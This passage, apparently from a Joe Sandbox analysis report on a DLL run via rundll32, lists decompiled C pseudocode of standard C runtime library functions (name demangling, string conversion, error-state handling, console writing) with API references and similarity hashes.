				signed int _v20;
				char _v28;
				void* _t46;
				intOrPtr _t47;
				signed int* _t48;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr _t53;
				intOrPtr _t57;
				char* _t60;
				char* _t62;
				signed int* _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				signed int _t80;
				intOrPtr _t87;
				intOrPtr* _t88;
				signed int _t89;
				signed int _t91;
				signed int _t94;

				_t87 =  *0x1004e004; // 0x0
				_t88 = _t87 + 1;
				 *0x1004e004 = _t88;
				_t74 =  *_t88;
				_t94 = 0;
				_t70 = _t74;
				_v12 = 0;
				_t91 = 0;
				_v8 = 0;
				_t46 = _t70 - 0x41;
				if(_t46 == 0) {
					if(_a16 != 0) {
						L32:
						_t42 = _t88 + 1; // 0x1
						_t47 = _t42;
						L33:
						 *0x1004e004 = _t47;
						_t48 = _a4;
						_t48[1] = _t94;
						L34:
						 *_t48 = _t94;
						L35:
						return _t48;
					}
					_t49 = _a8;
					if( *_t49 == 2 ||  *_t49 == 3) {
						 *_t49 = 5;
						goto L31;
					} else {
						if( *_t49 != 1) {
							goto L32;
						}
						 *_t49 = 4;
						L31:
						_t88 =  *0x1004e004; // 0x0
						goto L32;
					}
				}
				_t50 = _t46 - 1;
				if(_t50 == 0) {
					if(_a16 == 0) {
						 *_a12 = 1;
						E10008798( &_v12, 0x3e);
						L24:
						_t53 =  *0x1004e004; // 0x0
						_t47 = _t53 + 1;
						goto L33;
					}
					L22:
					_t48 = _a4;
					_t48[1] = _t94;
					_t48[1] = 2;
					goto L34;
				}
				if(_t50 == 1) {
					 *_a8 = 5;
					goto L24;
				}
				if(_t74 == 0) {
					L19:
					E100072DE(_a4, 1);
					_t48 = _a4;
					goto L35;
				}
				_t57 =  *((intOrPtr*)(_t88 + 1));
				if(_t57 == 0) {
					goto L19;
				}
				if(_a16 != 0) {
					goto L22;
				}
				_t5 = _t70 - 0x30; // -48
				_t6 = _t88 + 2; // 0x3
				 *0x1004e004 = _t6;
				_t73 = _t57 + 0xffffffd0 + (_t5 << 4);
				if(_t57 + 0xffffffd0 + (_t5 << 4) > 1) {
					E10008798( &_v12, 0x2c);
					_t69 = E100076A6( &_v12,  &_v28, E100073B4( &_v20, _t73, 0));
					_t94 =  *_t69;
					_t91 = _t69[1];
				}
				_v20 = _t94;
				_v16 = _t91;
				E100077F7( &_v20, 0x3e);
				_t60 =  *0x1004e004; // 0x0
				_t89 = _v20;
				_t80 = _v16;
				_v12 = _t89;
				_v8 = _t80;
				if( *_t60 != 0x24) {
					_v16 = _t80;
					_v20 = _t89;
					E100077F7( &_v20, 0x5e);
					_t89 = _v20;
					_t80 = _v16;
					_t62 =  *0x1004e004; // 0x0
					_v12 = _t89;
					_v8 = _t80;
				} else {
					_t62 = _t60 + 1;
					 *0x1004e004 = _t62;
				}
				if( *_t62 == 0) {
					if(_t80 <= 1) {
						if(_t89 == 0) {
							E10007596( &_v12, 1);
						} else {
							E10006F36( &_v12, 0x100438b4);
						}
						_t89 = _v12;
						_t80 = _v8;
					}
				} else {
					 *0x1004e004 = _t62 + 1;
				}
				_t48 = _a4;
				 *_t48 = _t89;
				_t48[1] = _t80 | 0x00004000;
				goto L35;
			}

0x1000a24e
0x1000a254
0x1000a256
0x1000a25d
0x1000a25f
0x1000a261
0x1000a267
0x1000a26a
0x1000a26c
0x1000a26f
0x1000a272
0x1000a3be
0x1000a3e6
0x1000a3e6
0x1000a3e6
0x1000a3e9
0x1000a3e9
0x1000a3ee
0x1000a3f1
0x1000a3f4
0x1000a3f4
0x1000a3f6
0x1000a3fa
0x1000a3fa
0x1000a3c0
0x1000a3c6
0x1000a3da
0x00000000
0x1000a3cd
0x1000a3d0
0x00000000
0x00000000
0x1000a3d2
0x1000a3e0
0x1000a3e0
0x00000000
0x1000a3e0
0x1000a3c6
0x1000a278
0x1000a27b
0x1000a395
0x1000a3ab
0x1000a3ae
0x1000a3b3
0x1000a3b3
0x1000a3b8
0x00000000
0x1000a3b8
0x1000a397
0x1000a397
0x1000a39a
0x1000a39d
0x00000000
0x1000a39d
0x1000a284
0x1000a38a
0x00000000
0x1000a38a
0x1000a28c
0x1000a378
0x1000a37d
0x1000a382
0x00000000
0x1000a382
0x1000a292
0x1000a297
0x00000000
0x00000000
0x1000a2a0
0x00000000
0x00000000
0x1000a2a6
0x1000a2af
0x1000a2b5
0x1000a2ba
0x1000a2bf
0x1000a2c6
0x1000a2dd
0x1000a2e2
0x1000a2e4
0x1000a2e4
0x1000a2ec
0x1000a2ef
0x1000a2f2
0x1000a2f7
0x1000a2fc
0x1000a2ff
0x1000a302
0x1000a308
0x1000a30b
0x1000a315
0x1000a31d
0x1000a320
0x1000a325
0x1000a328
0x1000a32b
0x1000a330
0x1000a333
0x1000a30d
0x1000a30d
0x1000a30e
0x1000a30e
0x1000a339
0x1000a346
0x1000a34d
0x1000a35d
0x1000a34f
0x1000a354
0x1000a354
0x1000a362
0x1000a365
0x1000a365
0x1000a33b
0x1000a33c
0x1000a33c
0x1000a368
0x1000a371
0x1000a373
0x00000000

APIs

DName::DName.LIBVCRUNTIME ref: 1000A2D0

Part of subcall function 100073B4: __aulldvrm.LIBCMT ref: 100073E5

DName::operator+.LIBCMT ref: 1000A2DD
DName::operator=.LIBVCRUNTIME ref: 1000A35D
DName::DName.LIBVCRUNTIME ref: 1000A37D

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: NameName::$Name::operator+Name::operator=__aulldvrm
String ID:
API String ID: 2448499823-0
Opcode ID: 90b53fb15ac9b4906040d35faff781823134f217f45143ff32974585a6f67a62
Instruction ID: 4432753ead1cd1f4d13ab9af0bf177137c14a2538a54f020a321214d9f530d75
Opcode Fuzzy Hash: 90b53fb15ac9b4906040d35faff781823134f217f45143ff32974585a6f67a62
Instruction Fuzzy Hash: 1D519E74D04255DFEB05CF58CA80A9EBBF4FB46380F10829AF9159B259D7B0AF80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 100269CF, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100269CF(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E10028BDD(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E10028BDD(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E10024468(GetLastError());
									_t19 =  *((intOrPtr*)(E1002449E(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E10027754(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E10024468(GetLastError());
						return  *((intOrPtr*)(E1002449E(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E10027754(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E10027720(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x100269d6
0x100269db
0x100269f9
0x100269fb
0x100269fe
0x10026a2b
0x10026a33
0x10026a35
0x10026a4e
0x10026a51
0x10026a54
0x10026a62
0x10026a71
0x10026a79
0x10026a7b
0x10026a94
0x10026a97
0x10026a97
0x10026a7d
0x10026a84
0x10026a8f
0x10026a8f
0x10026a99
0x00000000
0x10026a99
0x10026a59
0x10026a5e
0x10026a60
0x00000000
0x00000000
0x00000000
0x10026a60
0x10026a3e
0x00000000
0x10026a49
0x10026a00
0x10026a03
0x10026a06
0x10026a19
0x10026a1c
0x100269ef
0x100269ef
0x00000000
0x100269f2
0x10026a0c
0x10026a11
0x10026a13
0x10026a9d
0x10026a9d
0x00000000
0x10026a13
0x100269dd
0x100269e2
0x100269e7
0x100269e9
0x100269ec
0x00000000

APIs

Part of subcall function 10027720: _free.LIBCMT ref: 1002772E

Part of subcall function 10028BDD: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,1002B316,10032FF6,0000FDE9,00000000,?,?,?,10032D5E,0000FDE9,00000000,?), ref: 10028C89

GetLastError.KERNEL32 ref: 10026A37
__dosmaperr.LIBCMT ref: 10026A3E
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10026A7D
__dosmaperr.LIBCMT ref: 10026A84

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: dafd7d44092715414cc22d533bd9d2ee6f711b83f96ec667994af98859a43765
Instruction ID: bd05e1bc39f87d2aee2b562c84437264c3a7a5bb9226fc401e292b52289c8790
Opcode Fuzzy Hash: dafd7d44092715414cc22d533bd9d2ee6f711b83f96ec667994af98859a43765
Instruction Fuzzy Hash: BE21C575600216BFD710DFA5AC8195BB7ECFF093A47A2C529F919A7151DB30FC408BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10023FB6, Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E10023FB6(void* __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x1004d0a0; // 0xffffffff
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E1002A104(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E10026850(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E1002A104(__eflags,  *0x1004d0a0, _t51);
							if(__eflags != 0) {
								E10023C29(_t51, 0x1004e3b0);
								E100268B3(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E1002A104(__eflags,  *0x1004d0a0, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E1002A104(0,  *0x1004d0a0, 0);
							_push(0);
							L9:
							E100268B3();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E1002A0C5(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x1004d0a0; // 0xffffffff
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E10012120(_t39, _t43, _t49, _t60);
					asm("int3");
					_t5 =  *0x1004d0a0; // 0xffffffff
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E1002A104(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E10026850(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E1002A104(__eflags,  *0x1004d0a0, _t60);
								if(__eflags != 0) {
									E10023C29(_t60, 0x1004e3b0);
									E100268B3(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E1002A104(__eflags,  *0x1004d0a0, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E1002A104(__eflags,  *0x1004d0a0, _t20);
								_push(_t60);
								L25:
								E100268B3();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E1002A0C5(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x1004d0a0; // 0xffffffff
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E10012120(_t39, _t43, _t49, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x1004d0a0; // 0xffffffff
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E1002A104(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E10026850(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E1002A104(__eflags,  *0x1004d0a0, _t54);
											if(__eflags != 0) {
												E10023C29(_t54, 0x1004e3b0);
												E100268B3(0);
												goto L45;
											} else {
												_t40 = 0;
												E1002A104(__eflags,  *0x1004d0a0, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E1002A104(0,  *0x1004d0a0, 0);
											_push(0);
											L41:
											E100268B3();
											goto L36;
										}
									}
								} else {
									_t54 = E1002A0C5(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x1004d0a0; // 0xffffffff
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x10023fb6
0x10023fb6
0x10023fc1
0x10023fc3
0x10023fc8
0x10023fcb
0x10023fe9
0x10023fec
0x10023ff1
0x10023ff3
0x00000000
0x10023ff5
0x10024001
0x10024004
0x10024005
0x10024007
0x1002402c
0x1002402e
0x10024047
0x1002404e
0x10024053
0x00000000
0x10024030
0x10024030
0x10024039
0x1002403e
0x00000000
0x1002403e
0x10024009
0x10024009
0x10024009
0x10024012
0x10024017
0x10024018
0x10024018
0x1002401d
0x00000000
0x1002401d
0x10024007
0x10023fcd
0x10023fd3
0x10023fd7
0x10023fe4
0x00000000
0x10023fd9
0x10023fdc
0x10024056
0x10024056
0x10023fde
0x10023fde
0x10023fde
0x10023fe0
0x10023fe0
0x10023fe0
0x10023fdc
0x10023fd7
0x10024059
0x10024061
0x10024063
0x10024065
0x1002406d
0x10024072
0x10024073
0x10024078
0x10024079
0x1002407c
0x10024096
0x10024099
0x1002409e
0x100240a0
0x00000000
0x100240a2
0x100240ae
0x100240b1
0x100240b2
0x100240b4
0x100240d7
0x100240d9
0x100240f0
0x100240f7
0x100240fc
0x00000000
0x100240db
0x100240e2
0x100240e7
0x00000000
0x100240e7
0x100240b6
0x100240bd
0x100240c2
0x100240c3
0x100240c3
0x100240c8
0x00000000
0x100240c8
0x100240b4
0x1002407e
0x10024084
0x10024086
0x10024088
0x10024091
0x00000000
0x1002408a
0x1002408a
0x1002408d
0x10024107
0x10024107
0x1002410c
0x1002410f
0x10024110
0x10024111
0x10024118
0x1002411a
0x1002411f
0x10024122
0x10024140
0x10024143
0x10024148
0x1002414a
0x00000000
0x1002414c
0x10024158
0x1002415c
0x1002415e
0x10024183
0x10024185
0x1002419e
0x100241a5
0x00000000
0x10024187
0x10024187
0x10024190
0x10024195
0x00000000
0x10024195
0x10024160
0x10024160
0x10024160
0x10024169
0x1002416e
0x1002416f
0x1002416f
0x00000000
0x10024174
0x1002415e
0x10024124
0x1002412a
0x1002412c
0x1002412e
0x1002413b
0x00000000
0x10024130
0x10024130
0x10024133
0x100241ad
0x100241ad
0x10024135
0x10024135
0x10024135
0x10024135
0x10024137
0x10024137
0x10024137
0x10024133
0x1002412e
0x100241b0
0x100241b8
0x100241ba
0x100241ba
0x100241c1
0x1002408f
0x100240ff
0x100240ff
0x10024101
0x00000000
0x10024103
0x10024106
0x10024106
0x10024101
0x1002408d
0x10024088
0x10024067
0x1002406c
0x1002406c

APIs

GetLastError.KERNEL32(?,70D9FFF6,?,1000F7D4,70D9FFF6,?,00000000,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10023FBB
_free.LIBCMT ref: 10024018
_free.LIBCMT ref: 1002404E
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10024059

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: a1aad8c9c926d5f200dfc129fa4bf32ee5e2d12d2605714079376170c75a9ece
Instruction ID: 23280f8c2260b11c3a06f993c25238af481de1058feaba7f8c12448f37a63b00
Opcode Fuzzy Hash: a1aad8c9c926d5f200dfc129fa4bf32ee5e2d12d2605714079376170c75a9ece
Instruction Fuzzy Hash: AE11E3367042052FE241E7647EC6E1B22A9DBC26B4BE30235FB24D32E2DD319C918524

Uniqueness

Uniqueness Score: -1.00%

Function 1002410D, Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E1002410D(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x1004d0a0; // 0xffffffff
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E1002A104(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E10026850(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E1002A104(__eflags,  *0x1004d0a0, _t18);
							if(__eflags != 0) {
								E10023C29(_t18, 0x1004e3b0);
								E100268B3(0);
								goto L13;
							} else {
								_t13 = 0;
								E1002A104(__eflags,  *0x1004d0a0, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E1002A104(0,  *0x1004d0a0, 0);
							_push(0);
							L9:
							E100268B3();
							goto L4;
						}
					}
				} else {
					_t18 = E1002A0C5(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x1004d0a0; // 0xffffffff
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x10024118
0x1002411a
0x1002411f
0x10024122
0x10024140
0x10024143
0x10024148
0x1002414a
0x00000000
0x1002414c
0x10024158
0x1002415c
0x1002415e
0x10024183
0x10024185
0x1002419e
0x100241a5
0x00000000
0x10024187
0x10024187
0x10024190
0x10024195
0x00000000
0x10024195
0x10024160
0x10024160
0x10024160
0x10024169
0x1002416e
0x1002416f
0x1002416f
0x00000000
0x10024174
0x1002415e
0x10024124
0x1002412a
0x1002412e
0x1002413b
0x00000000
0x10024130
0x10024133
0x100241ad
0x100241ad
0x10024135
0x10024135
0x10024135
0x10024137
0x10024137
0x10024137
0x10024133
0x1002412e
0x100241b0
0x100241b8
0x100241c1

APIs

GetLastError.KERNEL32(00000000,70D9FFF6,00000000,100244A3,1000FB64,1000E746,00000000,00000000), ref: 10024112
_free.LIBCMT ref: 1002416F
_free.LIBCMT ref: 100241A5
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF), ref: 100241B0

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 731426067ea15b7500fd783031a9d42682068e30897745dd2089e4c5b4501170
Instruction ID: 57a6f9a0da5a3930e0307264933162919cbfd296d3a065086be207032b37c94b
Opcode Fuzzy Hash: 731426067ea15b7500fd783031a9d42682068e30897745dd2089e4c5b4501170
Instruction Fuzzy Hash: 8611A53A3016516FE601E6757DC6F1B36A9DBD26B4FE30235F924D32E2DE219CA18114

Uniqueness

Uniqueness Score: -1.00%

Function 10023E5B, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10023E5B(void* __ecx) {
				intOrPtr _t3;
				signed int _t4;
				signed int _t6;
				signed int _t13;
				signed int _t14;
				long _t21;
				signed int _t23;

				_t21 = GetLastError();
				_t3 =  *0x1004d0a0; // 0xffffffff
				_t27 = _t3 - 0xffffffff;
				if(_t3 == 0xffffffff) {
					L4:
					_t4 = E1002A104(__eflags, _t3, 0xffffffff);
					__eflags = _t4;
					if(_t4 != 0) {
						_t23 = E10026850(1, 0x364);
						__eflags = _t23;
						if(__eflags != 0) {
							_t6 = E1002A104(__eflags,  *0x1004d0a0, _t23);
							__eflags = _t6;
							if(_t6 != 0) {
								E10023C29(_t23, 0x1004e3b0);
								E100268B3(0);
								_t14 = _t23;
							} else {
								_t14 = 0;
								__eflags = 0;
								E1002A104(0,  *0x1004d0a0, 0);
								_push(_t23);
								goto L10;
							}
						} else {
							_t14 = 0;
							E1002A104(__eflags,  *0x1004d0a0, 0);
							_push(0);
							L10:
							E100268B3();
						}
					} else {
						_t14 = 0;
					}
				} else {
					_t13 = E1002A0C5(_t27, _t3);
					if(_t13 == 0) {
						_t3 =  *0x1004d0a0; // 0xffffffff
						goto L4;
					} else {
						_t1 = _t13 + 1; // 0x1
						asm("sbb ebx, ebx");
						_t14 =  ~_t1 & _t13;
					}
				}
				SetLastError(_t21);
				return _t14;
			}

0x10023e65
0x10023e67
0x10023e6c
0x10023e6f
0x10023e8b
0x10023e8e
0x10023e93
0x10023e95
0x10023ea8
0x10023eac
0x10023eae
0x10023ec8
0x10023ecd
0x10023ecf
0x10023eee
0x10023ef5
0x10023efd
0x10023ed1
0x10023ed1
0x10023ed1
0x10023eda
0x10023edf
0x00000000
0x10023edf
0x10023eb0
0x10023eb0
0x10023eb9
0x10023ebe
0x10023ee0
0x10023ee0
0x10023ee5
0x10023e97
0x10023e97
0x10023e97
0x10023e71
0x10023e72
0x10023e79
0x10023e86
0x00000000
0x10023e7b
0x10023e7b
0x10023e80
0x10023e82
0x10023e82
0x10023e79
0x10023f01
0x10023f0b

APIs

GetLastError.KERNEL32 ref: 10023E5F
_free.LIBCMT ref: 10023EE0
SetLastError.KERNEL32(00000000), ref: 10023F01

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 445ed5583abc66aff0091bdda5422eaa6d15ea046edcdaec4caaf5e3fdfc071f
Instruction ID: e08d1e95c12827319e42ff99bf0cbd6eb4c5bc448b54ed9f77757ffd9b9b94e2
Opcode Fuzzy Hash: 445ed5583abc66aff0091bdda5422eaa6d15ea046edcdaec4caaf5e3fdfc071f
Instruction Fuzzy Hash: DF1104357053226FEB10E7B4BEC6F1B3798DB022B8BE20235FD10D21E2DE546C4A9164

Uniqueness

Uniqueness Score: -1.00%

Function 1003B8D4, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1003B8D4(void** _a4) {
				void* _t12;
				void** _t13;

				_t13 = _a4;
				_t12 = WriteConsoleW( *0x1004d8f0,  *_t13, _t13[1], _t13[2], 0);
				if(_t12 == 0 && GetLastError() == 6) {
					E1003B9A3();
					E1003B965();
					_t12 = WriteConsoleW( *0x1004d8f0,  *_t13, _t13[1], _t13[2], _t12);
				}
				return _t12;
			}

0x1003b8da
0x1003b8f4
0x1003b8f8
0x1003b905
0x1003b90a
0x1003b924
0x1003b924
0x1003b92b

APIs

WriteConsoleW.KERNEL32 ref: 1003B8EE
GetLastError.KERNEL32 ref: 1003B8FA

Part of subcall function 1003B9A3: CloseHandle.KERNEL32(FFFFFFFE), ref: 1003B9B3

___initconout.LIBCMT ref: 1003B90A

Part of subcall function 1003B965: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 1003B978

WriteConsoleW.KERNEL32 ref: 1003B91E

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 685eef77ad1800851d9f857d5739ebb636a0bac401fd8fe300b65c4c84b708e6
Instruction ID: 383a7036c8f4c86a359b566b59d293377cabd9f826cc08592a6f7cb210b54fdd
Opcode Fuzzy Hash: 685eef77ad1800851d9f857d5739ebb636a0bac401fd8fe300b65c4c84b708e6
Instruction Fuzzy Hash: E5F05E3A200516BFDB126B96CD48B467BF6EFCA261B11441AFB49C6530CA31A850DB64

Uniqueness

Uniqueness Score: -1.00%

Function 1003B9BA, Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1003B9BA(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x1004d8f0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E1003B9A3();
					E1003B965();
					_t13 = WriteConsoleW( *0x1004d8f0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x1003b9d7
0x1003b9db
0x1003b9e8
0x1003b9ed
0x1003ba08
0x1003ba08
0x1003ba0e

APIs

WriteConsoleW.KERNEL32 ref: 1003B9D1
GetLastError.KERNEL32(?,100395D6,?,00000001,?,00000001,?,10032A34,?,?,00000001,?,00000001,?,10032F91,1002B316), ref: 1003B9DD

Part of subcall function 1003B9A3: CloseHandle.KERNEL32(FFFFFFFE), ref: 1003B9B3

___initconout.LIBCMT ref: 1003B9ED

Part of subcall function 1003B965: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 1003B978

WriteConsoleW.KERNEL32 ref: 1003BA02

